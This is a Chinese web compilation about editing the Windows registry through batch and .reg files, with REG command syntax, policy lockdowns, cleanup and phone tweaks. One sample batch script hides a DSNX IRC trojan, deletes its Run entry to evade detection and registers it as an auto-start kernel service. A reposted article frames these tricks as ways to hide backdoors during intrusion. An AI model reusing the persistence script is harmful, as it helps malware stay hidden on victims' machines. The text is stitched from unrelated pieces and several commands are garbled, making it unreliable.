如何用批处理修改注册表方法二则
禁止使用命令提示符程序和批处理文件
Windows 2000/XP下的命令提示符(即CMD.exe程序)相当于Windows 98下的MS-DOS程序。出于系统本身安全考虑,应防止非法用户在命令提示符下或是利用批处理文件(BAT文件)对计算机进行破坏,这可通过修改注册表来实现。
选择【开始】→【运行】命令,在【运行】对话框的【打开】文本框中输入“regedit.exe”,单击【确定】按钮,运行注册表编辑器,依次打开以下键:
HKEY_CURRENT_USER\Software\Policies\Microsoft\System
在右边的窗口中新建一个DWORD值,其名称为DisableCMD,设数值数据为2,则表示命令提示符程序和批处理文件都不能被运行,其值为1,则只是禁止命令提示符的运行。
示例:
echo REGEDIT4>iedown.reg
echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]>>iedown.reg
echo "1803"=dword:00000000>>iedown.reg
以上生成REG文件.
regedit /s iedown.reg
del iedown.reg
运行REG后删除之.
还可以:写一个注册表文件,放在一个位置..
然后批处理导入:
@echo off
regedit /s 注册表文件路径
exit
说明:/s是不弹出确认提示直接导入
先学习一下如何使用.REG文件来操
作注册表.(我们可以用批处理来生成一个REG文件)
关于注册表的操作,常见的是创建、修改、删除。
1.创建
创建分为两种,一种是创建子项(Subkey)
我们创建一个文件,内容如下:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\hacker]
然后执行该脚本,你就已经在HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft下创建了一个名字为"hacker"的子项。
另一种是创建一个项目名称
那这种文件格式就是典型的文件格式,和你从注册表中导出的文件格式一致,内容如下:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Invader"="Ex4rch"
"Door"=C:\\WINNT\\system32\\door.exe
"Autodos"=dword:02
这样就在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]下新建了:Invader、door、about这三个项目
Invader的类型是"String value"
door的类型是"REG SZ value"
Autodos的类型是"DWORD value"
2.修改
修改相对来说比较简单,只要把你需要修改的项目导出,然后用记事本进行修改,然后导入(regedit /s)即可。
3.删除
我们首先来说说删除一个项目名称,我们创建一个如下的文件:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Ex4rch"=-
执行该脚本,[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]下的"Ex4rch"就被删除了;
我们再看看删除一个子项,我们创建一个如下的脚本:
Windows Registry Editor Version 5.00
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
执行该脚本,[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]就已经被删除了。
相信看到这里,.reg文件你基本已经掌握了。那么现在的目标就是用批处理来创建特定内容的.reg文件了,记得我们前面说道的利用重定向符号可以很容易地创建特定类型的文件。
samlpe1:如上面的那个例子,如想生成如下注册表文件
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Invader"="Ex4rch"
"door"=hex:255
"Autodos"=dword:000000128
只需要这样:
@echo Windows Registry Editor Version 5.00>>Sample.reg
@echo
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]>Sample.re g
@echo "Invader"="Ex4rch">>Sample.reg
@echo "door"=5>>C:\\WINNT\\system32\\door.exe>>Sample.reg
@echo "Autodos"=dword:02>>Sample.reg
samlpe2:
我们现在在使用一些比较老的木马时,可能会在注册表的
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run(Runonce、Runservices、
Runexec)]下生成一个键值用来实现木马的自启动.但是这样很容易暴露木马程序的路径,从而导致木马被查
杀,相对地若是将木马程序注册为系统服务则相对安全一些.下面以配置好地IRC木马DSNX 为例(名为
windrv32.exe)
@start windrv32.exe
@attrib +h +r windrv32.exe
@echo
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >>patch.dll
@echo "windsnx "=- >>patch.dll
@sc.exe create Windriversrv type= kernel start= auto displayname= WindowsDriver binpath=
c:\winnt\system32\windrv32.exe
@regedit /s patch.dll
@delete patch.dll
@REM [删除DSNXDE在注册表中的启动项,用sc.exe将之注册为系统关键性服务的同时将其属性设为隐藏和
只读,并config为自启动]
@REM 这样不是更安全.
怎么用批处理命令删注册表里的键值或用命令的方法删注册表值?
REG DELETE KeyName [/v ValueName | /ve | /va] [/f]
KeyName [\\Machine\]FullKey
Machine 远程机器名- 忽略当前机器的默认值。
远程机器上只有HKLM 和HKU。
FullKey ROOTKEY\SubKey
ROOTKEY [ HKLM | HKCU | HKCR | HKU | HKCC ]
SubKey 所选ROOTKEY 下的注册表项的全名。
ValueName 所选项下的要删除的值的名称。
省略时,该项下的所有子项和值都会被删除。
/ve 删除空白值名称的值(默认)。
/va 删除该项下的所有值。
/f 不用提示就强行删除。
例如:
REG DELETE HKLM\Software\MyCo\MyApp\Timeout
删除注册表项Timeout 及其所有子项和值
REG DELETE \\ZODIAC\HKLM\Software\MyCo /v MTU
删除ZODIAC 上MyCo 下的注册表项MTU
regedit.exe的参数
filename 导入.reg 文件进注册表
/s 导入.reg 文件进注册表(安静模式)
/e 导出注册表文件
例:regedit /e filename.reg HKEY_LOCAL_MACHINE\SYSTEM
/L:system 指定system.dat
/R:user 指定user.dat
隐藏导入注册表信息用regedit /s 即可
在DOS提示符下键入Regedit命令,将出现一个帮助屏幕。此屏幕给出了其命令行参数及其使用方法。
语法:Regedit[/L:system][/R:user]filename1
Regedit[/L:system][/R:user]/Cfilename2
Regedit[/L:system][/R:user]/Efilename3[regpath]
其中:
/L:system指定system.dat文件的存放位置。
/L:user指定user.dat文件的存放位置。
filename1指定引入注册表数据库的文件名。
/Cfilename2指定形成注册表数据库的文件名。
/Efilename3指定导出注册表文件的文件名。
regpath指定导出注册表文件的开始关键字(缺省为全部关键字)
现举几个例子说明regedit.exe在DOS下的使用方法。
【例1】将系统注册表数据库registry导出到reg1.reg文件中。
regedit/Ereg1.reg
【例2】reg1.reg形成系统注册表数据库registry(全部)中。
regedit/Creg1.reg
【例3】将reg.dat引入系统注册表数据库中(部分)。
regeditreg.dat
【例4】将CJH开始的关键字导出注册表数据库,并命名为cjh.reg。
regedit/Ecjh.regcjh
【例5】指定system/dat存放在D:\PWIN中和user.dat存放在E:\PWIN中,将reg.dat数据文件形成一个新的注册表数据库registry。
regedit/L:D:\PWIN/R:E:\PWIN/Creg.dat
有了以上这些知识,结合在《对注册表进行编程的“捷径”》里讲过的关于导入或导出的注册表文件(*.REG),我们就可以在DOS方式下对注册表进行编程了。
我们还是以更改“*.txt”文件的默认打开方式——“记事本”为“写字板”为例。首先在MS-DOS提示符下导出“HKEY_CLASSES_ROOT\txtfile”子键这一分支,即执行命令:
regedit/Etxt.regHKEY_CLASSES_ROOT\txtfile
然后用DOS下的EDIT编辑器打开txt.reg文件进行编辑:将其中所有的“C:\\WINDOWS\\NOTEPAD.EXE”全部改成“C:\\WINDOWS\\WRITE.EXE”,存盘退出EDIT,再在命令行下执行命令:
regedittxt.reg
XP上新加的注册表操作命令
ADD
REG ADD KeyName [/v ValueName | /ve] [/t Type] [/s Separator] [/d Data] [/f]
KeyName [\\Machine\]FullKey
远程机器的机器名- 忽略默认到当前机器。
远程机器上只有HKLM 和HKU。
FullKey ROOTKEY\SubKey
ROOTKEY [ HKLM | HKCU | HKCR | HKU | HKCC ]
SubKey 所选ROOTKEY 下注册表项的完整名
/v 所选项之下要添加的值名
/ve 为注册表项添加空白值名<无名称>
/t RegKey 数据类型
[ REG_SZ | REG_MULTI_SZ | REG_DWORD_BIG_ENDIAN |
REG_DWORD | REG_BINARY | REG_DWORD_LITTLE_ENDIAN |
REG_NONE | REG_EXPAND_SZ ]
如果忽略,则采用REG_SZ
/s 指定一个在REG_MULTI_SZ 数据字符串中
用作分隔符的字符
如果忽略,则将"\0" 用作分隔符
/d 要分配给添加的注册表ValueName 的数据
/f 不用提示就强行改写现有注册表项
例如:
REG ADD \\ABC\HKLM\Software\MyCo
添加远程机器ABC 上的一个注册表项HKLM\Software\MyCo
REG ADD HKLM\Software\MyCo /v Data /t REG_BINARY /d fe340ead
添加一个值(名称: Data,类型: REG_BINARY,数据: fe340ead)
REG ADD HKLM\Software\MyCo /v MRU /t REG_MULTI_SZ /d fax\0mail
添加一个值(名称: MRU,类型: REG_MUTLI_SZ,数据: fax\0 COMPARE
REG COMPARE KeyName1 KeyName2 [/v ValueName | /ve] [Output] [/s] KeyName [\\Machine\]FullKey
Machine 远程机器名- 省略当前机器的默认值
远程机器上只有HKLM 和HKU
FullKey ROOTKEY\SubKey
如果没有指定FullKey2,FullKey2 则跟FullKey1 相同ROOTKEY [ HKLM | HKCU | HKCR | HKU | HKCC ]
SubKey 所选ROOTKEY 下的注册表项的全名
ValueName 所选注册表项下的要比较的值的名称
省略时,该项下的所有值都会得到比较
/ve 比较空白值
/s 比较所有子项和值
Output [/oa | /od | /os | /on]
省略时,只显示不同的结果
/oa 显示所有不同和匹配结果
/od 只显示不同的结果
/os 只显示匹配结果
/on 不显示结果
返回代码:
0 - 成功,比较的结果相同
1 - 失败
2 - 成功,比较的结果不同
例如:
REG COMPARE HKLM\Software\MyCo\MyApp HKLM\Software\MyCo\SaveMyApp
将注册表项MyApp 下的所有值跟SaveMyApp 比较
REG COMPARE HKLM\Software\MyCo HKLM
COPY
REG COPY KeyName1 KeyName2 [/s] [/f]
KeyName [\\Machine\]FullKey
Machine 远程机器名- 忽略当前机器的默认值
远程机器上只有HKLM 和HKU
FullKey ROOTKEY\SubKey
ROOTKEY [ HKLM | HKCU | HKCR | HKU | HKCC ]
SubKey 所选ROOTKEY 下的注册表项的全名
/s 复制所有子项和值
/f 不用提示就强行复制
例如:
REG COPY HKLM\Software\MyCo\MyApp HKLM\Software\MyCo\SaveMyApp /s
将注册表项MyApp 下的所有子项和值复制到注册表项SaveMyApp
REG COPY \\ZODIAC\HKLM\Software\MyCo HKLM
DELETE
REG DELETE KeyName [/v ValueName | /ve | /va] [/f]
KeyName [\\Machine\]FullKey
Machine 远程机器名- 忽略当前机器的默认值
远程机器上只有HKLM 和HKU
FullKey ROOTKEY\SubKey
ROOTKEY [ HKLM | HKCU | HKCR | HKU | HKCC ]
SubKey 所选ROOTKEY 下的注册表项的全名
ValueName 所选项下的要删除的值的名称
省略时,该项下的所有子项和值都会被删除
/ve 删除空白值名称
/va 删除该项下的所有值
/f 不用提示就强行删除
例如:
REG DELETE HKLM\Software\MyCo\MyApp\Timeout
删除注册表项T
LOAD
REG LOAD KeyName FileName
KeyName ROOTKEY\SubKey (只是本地机器的)
ROOTKEY [ HKLM | HKU ]
SubKey 要将配置单元文件加载进的注册表项名称。创建一个新的注册表项FileName 要加载的配置单元文件名
您必须使用REG SA VE 来创建这个文件
QUERY
REG QUERY KeyName [/v ValueName | /ve] [/s]
KeyName [\Machine\]FullKey
Machine 远程机器名- 忽略当前机器的默认值
远程机器上只有HKLM 和HKU
FullKey 格式为ROOTKEY\SubKey
ROOTKEY [ HKLM | HKCU | HKCR | HKU | HKCC ]
SubKey 所选ROOTKEY 下的注册表项的全名/v 查询特定注册表项
ValueName 所选项下的要查询的值的名称
省略时,该项下的所有值都会得到查询
/ve 查询默认值或空白值名称
/s 查询所有子项和值
RESTORE
REG RESTORE KeyName FileName
KeyName ROOTKEY\SubKey (只是本地机器)
ROOTKEY [ HKLM | HKCU | HKCR | HKU | HKCC ]
SubKey 要将配置单元文件还原到的注册表项全名。
改写现有项的值和子项
FileName 要还原的配置单元文件名
您必须使用REG SA VE 来创建这个文件
SA VE
REG SA VE KeyName FileName
KeyName ROOTKEY\SubKey
ROOTKEY [ HKLM | HKCU | HKCR | HKU | HKCC ]
SubKey 所选ROOTKEY 下的注册表项的全名
FileName 要保存的磁盘文件名。如果没有指定路径,
文件会在调用进程的当前文件夹中得到创建
UNLOAD
REG UNLOAD KeyName
KeyName ROOTKEY\SubKey (只是本地机器的)
ROOTKEY [ HKLM | HKU ]
SubKey 要卸载的配置单元的注册表项名称
reg add "项" /v(value的缩写) 值/t(type) reg_dword(默认是eg_sz) /d(data的缩写) "要插入的数据值" /f(forbiden的缩写,即强制的意思)
例如
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session" /v test /t reg_dword /d 1 /f
这句命令就是往你的注册表
HKLM\SYSTEM\CurrentControlSet\Control\Session
这个项下面新建一个reg_dowrd 类型的值,名字为test,数据为1
/f 表示在运行如果注册表里已经有这个值也不会提示你,直接修改,
如果没有这个参数的话,它会提示你是不是要修改
一、什么是注册表啊 windows操作系统的注册表实际上是一个庞大的数据库,它包括操作系统的硬件配置、软件配置、用户环境和操作系统界面的数据信息。注册表是Windows操作系统的核心文件,它存放着各种参数,直接控制系统启动、硬件驱动程序的装载以及系统应用程序运行。注册表包括以下几部分内容。 ①软、硬件的相关配置和状态信息,应用程序和资源管理器外壳的初始条件、首选项和卸载数据。 ②联网电脑的整个系统的设置和各种许可信息,文件扩展名与应用程序的关联信息以及硬件部件的描述、状态和属性等信息。 ③性能记录、用户自定义设置以及其他数据信息。 注册表涵盖了软、硬件等多方面的设置信息,如果对这些设置修改得当,将会对系统本身和其中的软件进行优化。但注册表中存放着系统的所有配置信息,如果进行了错误的设置还会导致系统的瘫痪,所以不明白的键值一定不要随便修改。 二、修改注册表的作用 1、提高系统性能。通过修改注册表可以优化注册表,达到提高系统性能的目的。如加快系统启动速度及加速网上邻居访问速度。 2、增强系统安全性。如禁止修改IE主页。 3、解决系统常见故障。如解决IE窗口突然关闭的问题。 4、个性化操作系统。如在右键菜单中添加“在新窗口中打开”。 5、便于远程管理。 三、注册表编辑器的启动 启动注册表有两种方法: 1、开始—运行,输入“regedit"或者"regedt32" 2、在CMD中输入regedt32.exe,回车。 四、如果使注册表修改生效 1、重启电脑。一般情况下,如果修改与系统相关的内容,即HKEY_LOCAL_MACHINE根键下的内容,需要重新启动电脑才能生效。 2、刷新桌面。对桌面设置或效果的注册表值进行修改,系统是实时读取的,修改之后立即生效,但有时候也需要在桌面上刷新一下才能显示效果。 3、重启桌面。即按Ctrl+Alt+del,调出任务管理器,结束“Explorer.exe”,然后再
首先你得明白什么样的文件可以导入注册表 一般情况下第一行是 REGEDIT4 或是 Windows Registry Editor Version 5.00 第二行空掉 以下开始方括号中些下注册表路径 下行写键和键值 句提的我引一篇文章给你看 当初我也是这样学习的 你提到删除自己 这样的话可以使用语句 del %0 就好了 文章在下边,流传相当广的: 如何用批处理文件来操作注册表 在入侵过程中经常回操作注册表的特定的键值来实现一定的目的,例如:为了达到隐藏后门、木马程序而删除Run下残余的键值。或者创建一个服务用以加载后门。当然我们也会修改注册表来加固系统或者改变系统的某个属性,这些都需要我们对注册表操作有一定的了解。下面我们就先学习一下如何使用.REG文件来操作注册表.(我们可以用批处理来生成一个REG文件) 关于注册表的操作,常见的是创建、修改、删除。 1.创建 创建分为两种,一种是创建子项(Subkey) 我们创建一个文件,内容如下: Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\hacker] 然后执行该脚本,你就已经在HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft下创建了一个名字为“hacker”的子项。
另一种是创建一个项目名称 那这种文件格式就是典型的文件格式,和你从注册表中导出的文件格式一致,内容如下: Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]"Invader"="Ex4 rch" "Door"=C:\\WINNT\\system32\\door.exe "Autodos"=dword:02 这样就在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]下 新建了:Invader、door、about这三个项目 Invader的类型是“String Value” door的类型是“REG SZ Value” Autodos的类型是“DWORD Value” 2.修改 修改相对来说比较简单,只要把你需要修改的项目导出,然后用记事本进行修改,然后导入(regedit /s)即可。 3.删除 我们首先来说说删除一个项目名称,我们创建一个如下的文件: Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] "Ex4rch"=- 执行该脚本,[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]下的"Ex4rch"就被删除了; 我们再看看删除一个子项,我们创建一个如下的脚本: Windows Registry Editor Version 5.00
防止注册表被修改的方法 1、禁止修改注册表: 开始运行输入REGEDIT 打开 HKEY_CURRENT_USER\Software\Microsoft \Windows\CurrentVersion\Policies\System下,新建一个名为 DisableRegistryTools的DWORD值,并将其值改为“1”,即可禁止使用注册表编辑器Regedit.exe 对Windows 2000/xp/2003用户,还可以通过在Windows 2000下把服务里面的远程注册表操作服务“Remote Registry Service”禁用,来对付该类网页。具体方法是:点击“开始--》设置--》控制面板--》管理工具--》服务--》Remote Registry Service(允许远程注册表操作)”,将这一项禁用即可。 2、很多恶意网页是含有病害代码的ActiveX网页插件,因此在IE设置中将ActiveX 插件和控件、Java脚本等禁止在很大程度上就可以避免网页被修改。 方法:在IE窗口中点击“工具→Internet选项”,在弹出的对话框中选择“安全”标签,再点击[自定义级别]按钮,就会弹出“安全设置”对话框,把其中所有ActiveX插件和控件以及Java相关全部选择“禁用”即可。 3、不要轻易访问浏览一些自己不了解的站点,特别是那些看上去美丽诱人的网址,否则吃亏的往往是我们。 win 2000/xp: %SystemRoot%\system32\drivers\etc\hosts HOSTS文件里保存有WINDOWS系统记录的IP地址与域名的对应关系。 有些网页恶意代码会修改这个文件迫使我们访问恶意网页/网站。 另外一种实现方法是修改HOSTS文件,操作方法可参考:
禁止使用鼠标右键 在HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer下在右边的窗口中新建一个二进制值“NoViewContextMenu”,并设值为“01 00 00 00”。 修改后需重新启动WINDOWS,启动后,你将不能在桌面,驱动器,文件夹等地方使用鼠标右键 禁止磁盘空间不足时的警告 我们在安装软件的过程中,往往不能预料软件需要使用多大的磁盘空间,当空间不够的时候, 就会弹出一个空间不足的警告框,使用以下方法就是避免出现这个对话框 逐渐展开到HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\FileSystem 下 在右边的窗口中新建一个二进制值“DisableLowDiskSpaceBroadcast”,并设值为“FF FF FF FF”, 如果想恢复出现这个警告框,只需删除此键。电+脑*维+修-知.识_网(w_ww*dnw_xzs*co_m)禁止显示"远程管理" 在HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System下在右边的窗口中新建一个DWORD值“NoAdminPage”,并设值为“1”。电+脑*维+修-知.识_网(w_ww*dnw_xzs*co_m) 禁止显示“注销”菜单 在HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer下在右边的窗口中新建一个二进制值“NoLogOff”,并设值为“01 00 00 00”。电+脑*维+修-知.识_网(w_ww*dnw_xzs*co_m) 禁止显示“开始”菜单中“收藏夹”菜单 在HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer下在右边的窗口中新建一个值“NoFavoritesMenu”,并设值为“1”。电+脑*维+修-知.识_网(w_ww*dnw_xzs*co_m) 禁止使用inf文件 在HKEY_LOCAL_MACHINE\Software\CLASSES\.inf下 在右边的窗口中更改“默认”值为“txtfile” 禁止使用reg文件 在HKEY_LOCAL_MACHINE\Software\CLASSES\.reg下 在右边的窗口中更改“默认”值为“txtfile” 禁用"打印机"中的"删除打印机" 在HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer 下,在右边的窗口中新建DWORD值“NoDeletePrinter”,并设其值为“1”。电+脑*维+修-知.识_网(w_ww*dnw_xzs*co_m) 禁用"打印机"中的"添加打印机" 在HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
开始-->运行 一、regedit 进入注册表 1. gpedit.msc-----组策略 2. sndrec32-------录音机 3. Nslookup-------IP地址侦测器 4. explorer-------打开资源管理器 5. logoff---------注销命令 6. tsshutdn-------60秒倒计时关机命令 7. lusrmgr.msc----本机用户和组 8. services.msc---本地服务设置 9. oobe/msoobe /a----检查XP是否激活 10. notepad--------打开记事本 11. cleanmgr-------垃圾整理 12. net start messenger----开始信使服务 13. compmgmt.msc---计算机管理 14. net stop messenger-----停止信使服务 15. conf-----------启动netmeeting 16. dvdplay--------DVD播放器 17. charmap--------启动字符映射表 18. diskmgmt.msc---磁盘管理实用程序 19. calc-----------启动计算器 20. dfrg.msc-------磁盘碎片整理程序 21. chkdsk.exe-----Chkdsk磁盘检查 22. devmgmt.msc--- 设备管理器 23. regsvr32 /u *.dll----停止dll文件运行 24. drwtsn32------ 系统医生 25. rononce -p ----15秒关机 26. dxdiag---------检查DirectX信息 27. regedt32-------注册表编辑器 28. Msconfig.exe---系统配置实用程序 29. rsop.msc-------组策略结果集 30. mem.exe--------显示内存使用情况 31. regedit.exe----注册表 32. winchat--------XP自带局域网聊天 33. progman--------程序管理器 34. winmsd---------系统信息 35. perfmon.msc----计算机性能监测程序 36. winver---------检查Windows版本 37. sfc /scannow-----扫描错误并复原 38. taskmgr-----任务管理器(2000/xp/2003 39. winver---------检查Windows版本 40. wmimgmt.msc----打开windows管理体系结构(WMI) 41. wupdmgr--------windows更新程序 42. wscript--------windows脚本宿主设置
修改系统注册表(转载) 修改系统注册表(转载) Windows 98 注册表的应用 Windows 98注册表(Registry)是一个巨大的数据库,它包含了Windows 98 中软件和硬件的有关配置信息,是Windows 98 成功启动和正常使用不可缺少的初始化文件。一般情况下,普通用户无需与注册表打交道。但是运用本文所介绍的方法小心地使用注册表,却能给用户带来诸多方便。 1.确定文件的类型注册表中含有计算机中所有文件栏名与应用程序的关联记录,当不能确定某一文件类型时,可以请注册表帮忙。具体步骤为:(1)使用“开始”菜单的“运行”命令,启动Regedit 程序,打开注册表(Regedit 程序在Windows 目录下);(2)单击HKEY-CLASSES-ROOT 前面的加号,打开HKEY-CLASSES-ROOT 分支;(3)滚屏找到不认识的那个栏名,单击其文件夹图标,打开文件夹。同时,登记库右边的窗口将显示有关该文件的信息,主要是与之相关的程序,根据与之相关的程序我们可以确定文件的类型。 2.查看已安装的设备驱动程序在Windows 3.x中,我们可以用Notepad或Sysedit等编辑器打开SYSTEM.INI来查看已安装的设备驱动程序,但在Windows 98中尽管也有SYSTEM.INI 文件,但从该文件中我们只能查看到16 位的驱动程序。要了解32位的驱动程序安装情况,就必须利用注册表。打开注册表,查看下面这个子关键词窗口,可以获知计算机中已安装的设备驱动程序:
HKEY-LOCAL-MACHINE 3?在开始”菜单上创建控制面板”(Control Panel)文件夹(1)右键单击任务栏上的“开始”按钮,弹出快捷菜单。(2)单击“资源管理器”。(3)单击“文件”菜单的“新建文件夹”命令。(4)输入如下长文件名:Control Panel.21 EC2020-3AEA-1069-A2DD-08001B30309D 并回车。其中的串值来自于注册表中的一项,它告诉Windows 98,该项是一个特殊的“开始”菜单值,它在开始采单上显示“ControlPanel"。(5)关闭资源管理器”,再一次显示开始”菜单,发现“ControlPanel'文件夹已添加到其顶部,我们可以从中快捷地访问控制面板中的各项内容。 4.从快捷图标中删去小箭头为一个应用程序创建快捷方式后,其图标的左下方都有一个向上的箭头。我们可以通过修改注册表使这个小箭头消失。(1)运行Regedit,打开注册表;(2)滚屏找到“ HKEYCLASSES-ROO”关键词,选中“Inkfile和“Piffile的”“lsShortCu项;(3)打开菜单中的编辑”菜单,单击“删除”命令,将选中的项删除;(4)关闭注册表,重新启动Windows 98。你 会发现令人讨厌的小箭头已不复存在。 5.加速桌面下级菜单的显示我们打开“开始”菜单,指向“程序”项时,会发现其下级菜单显示有些“迟钝”。通过下面的修改可以加速其显示速度:(1)运行Regedit,打开注册表;(2)滚屏找到HKEY-CURRENT-USERPanel分支, 在右边窗口空白处单击鼠标右键,然后从弹出的快捷菜单中选择“新建” “串值”(String value),输入“ MenuShowDela”后回车,创建此键值;(3)在 “ MenuShowDelayt单击鼠标右键并选择修改”(Modify ),在键值数据(value
Win7系统清理系统垃圾方法大全 win7清理系统垃圾的方法有哪些? 答:win7垃圾文件存放的地方主要有两处:一个是在文件夹中,一个是存放在注册表里。 一、文件夹里的垃圾有:(假设Windows安装在C盘,如在其他分区替换字母即可) 1、“我的文档”里的垃圾,安放在C:\Windows\Recent文件夹中; 2、安装程序、编辑文件时产生的临时文件安放在c:\windows\temp文件夹中; 3、删除文件时扔往垃圾桶里的东西在C:\RECYCLED文件夹中(隐藏文件夹); 4、当你上网浏览网站时,Windows会在C:\WINDOWS\History和C:\Windows\Temporary Internet Files文件夹中保留下你曾看过的网页; 5、曾经登陆过的信息,微软还会保留cookie,这些都存放在C:\WINDOWS\Cookies中。 二、注册表里的垃圾有: 在Windows系统中,注册表是一个记录32位驱动的设置和位置的复杂的信息数据库。当操作系统需要存取硬件设备,它使用驱动程序,甚至设备是一个BIOS支持的设备。无BIOS 支持设备安装时必须需要驱动,这个驱动是独立于操作系统的,但是操作系统需要知道从哪里找到它们,文件名、版本号、其他设置和信息,没有注册表对设备的记录,它们就不能被使用。 长期的使用Windows系统,注册表被频繁的读取,总是会留下各种各样的残留信息,比如缺失的共享DLL文件、未使用的文件扩展名、类型库、字体、应用程序路径、帮助文件、废弃的软件等信息,都在注册表里!但我们最好不要手动去删除这些残留信息,以免误删导致系统出问题。推荐使用专业的清理工具来扫描、清理。 复制一下内容更改文件类型为.bat(txt----bat) @echo off color 0b echo ================================================================== echo. echo 您已启动WIN 7 系统垃圾清理,这里运行的命令都很安全! echo. echo ================================================================== echo. echo 在程序没有结束的信息时,请勿关闭本窗口! echo. echo ================================================================== echo. echo 正在清除系统垃圾文件,请稍后...... echo. echo ================================================================== echo. echo ********************************** echo.
1、在开始/设置/屏幕里出现竖屏/横屏的手动调节菜单 HKLM\System\GD\Rotation\HideOrientationUI 键值从"1"改为"0" 2、垂直滚动条变粗点(避免误操作) HKEY_LOCAL_MACHINE\System\GWE cyHScr改为15 3、来电时,将显示屏朝下关断铃声 HKEY_LOCAL_MACHONE\Software\HTC\PHONE中,FaceDownMuteRing 的键值改为"1" 4. 关掉开机动画和声音 HKEY_LOCAL_MACHONE\Software\HTC\HTCAnimation中"StartupGif"和"StartupWav"两个键改成其它名字; [这个方法我感觉是只是不显示不美观,但仍有停留时间,我喜欢在设备配置的待机界面将微软和运营商的待机界面显示时间由30000改为10000] 5、关闭“短信已发送”的提示信息 HKEY_LOCAL_MACHINE/SOFTWARE/icrosoft/Inbox 底下新建一个叫做Settings的项然后增加名字为SMSNoSentMsg 的Dword值,值设定为1 [另一种方法:在系统配置的信息设置中,将SMS已发送提示由“启用”改为“禁用”]
6、内存卡改名 HKEY_LOCAL_MACHONE\system\storagemanager\profiles Folder值由“存储卡”改为英文名“Storage Card”,或相反 7、防止通话时屏幕自动关闭 HKLM\Drivers\BuiltIn\RIL\EnableFastDormantDisplayDuringCall 键值设为"0" HKCU\ControlPanel\Phone Sleep置为"0" [第一次起作用,后来装了其它的通话录音软件就不行了] 8、调整屏幕灵敏度 HKLM\Drivers\TouchPanel\PressureThreshold 键值改为"240"(十进制,缺省值为"39") 9、更改TouchFLO 3D首页和主页左右软键功能 [网上介绍的注册表修改太复杂了,完全可用“KeySwop 0.4.1 左右软键设置工具”的软件修改更为方便] 10、新接收短信唤醒 HKLM\Drivers\BuiltIn\RIL DisableSMSWakeUpEvent的键值缺省值为"1",改为"0";
案例分析 小L在维护MB网吧网络的过程当中,发现很多电脑运行速度变慢,网络浏览速度也越来越慢,很多无用的程序和空菜单存在于电脑中。小李经过检测,排除了病毒等原因,并决定通过对注册表垃圾的清理和注册表错误的修正,来改善电脑运行状况。请协助通过注册表调整软件的运行性能、检测和恢复系统错误、定制桌面等。 学习目标 本章主要讲解注册表的基本知识。通过本章学习,读者应该掌握以下知识: 注册表的作用; 注册表的结构; 注册表子目录树的功能; 注册表编辑器的使用。
18.1.1 什么是注册表 注册表是一个树状分层的数据库,包含计算机中每个用户的配置文件、有关系统硬件的信息、安装的程序及属性设置等各种计算机软、硬件配置数据。注册表中存放着各种参数,直接控制着Windows的启动、硬件驱动程序的装载以及一些Windows应用程序的运行,在整个Windows系统中起着核心作用。用户可以通过注册表调整软件的运行性能、检测和恢复系统错误、定制桌面等。系统管理员还可以通过注册表来完成系统远程管理等。概括起来,注册表包括如下一些主要内容: (1)软、硬件的有关配置和状态信息。注册表中保存有应用程序的初始条件、首选项等信息。 (2)整个计算机系统的设置和各种许可,文件扩展名与应用程序的关联关系,硬件部件的描述、状态和属性等。 (3)性能记录和其它底层的系统状态信息。 18.1.2 注册表的作用 注册表在Windows Server 2003中起到中介的作用,负责系统同软件、硬件、用户之间的沟通。在Windows Server 2003中运行一个应用程序的时候,系统会从注册表取得相关信息,如数据文件的类型、保存文件的位置、菜单的样式、工具栏的内容、相应软件的安装日期、用户名、版本号、序列号等。用户可以定制应用软件的菜单、工具栏和外观,相关信息即存储在注册表中。利用注册表的这些特性,许多软件的试用版都可限制用户的使用次数或时间。 注册表会自动记录用户操作的结果。当用户改变了窗口的位置,大小和状态后,下一次打开同一窗口时,窗口会保持同样的位置和大小。这是因为在关闭窗口时,窗口的位置、状态(如最大化)、大小等信息也同时被保存在注册表中。在下一次打开窗口时,系统会从注册表取相应的参数,然后按照这些参数配置打开的窗口。同样,桌面的图标、任务栏的大小和位置也由注册表控制,当改变它们的大小和位置时,注册表会记录下它们在关机之前的位置。在下一次启动时,再从注册表取得相应的数据,并按照注册表中的信息显示这些对象。18.1.3 注册表的结构
